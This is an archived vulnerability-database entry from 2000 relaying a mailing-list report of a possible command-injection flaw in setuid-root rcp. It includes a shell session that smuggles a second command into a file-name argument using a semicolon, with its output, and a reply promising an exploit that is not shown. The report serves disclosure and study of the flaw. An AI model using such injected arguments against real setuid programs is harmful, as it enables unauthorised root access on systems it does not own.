Re: possible bug in rcp...

2000-11-24T00:00:00
ID SECURITYVULNS:DOC:972
Type securityvulns
Reporter Securityvulns
Modified 2000-11-24T00:00:00

Description

On Wed, Nov 22, 2000 at 09:11:20AM +1100, Andrew Griffiths wrote: > Here is a possible bug in rcp; since I think it calls system(). I > haven't had much time to play with this, because exama are coming up. > > It is negated because system() calls /bin/cp which with the newer > versions of bash, it drops it's effective credientals... > > $ ls -alF which rcp > -rwsr-xr-x 1 root root 14492 Jul 21 22:43 > /usr/sbin/rcp > > $ cd /tmp > $ echo bla > bob > $ rcp 'bob bobalina; /usrt/bin/id;' 127.0.0.1 > uid=500(andrewg) gid=500(andrewg) groups=500(andrewg) > sh: 127.0.0.1: command not found. > > Now doing a quick ltrace - it doesn't remove ; and ` and other fun > stuff. This could probably be exploited, on older bash bersions? > > It's up to you guys/girls now, I should start to study... > > Andrew Griffiths

just a wee exploit to help the boys and girls along innit

tlabs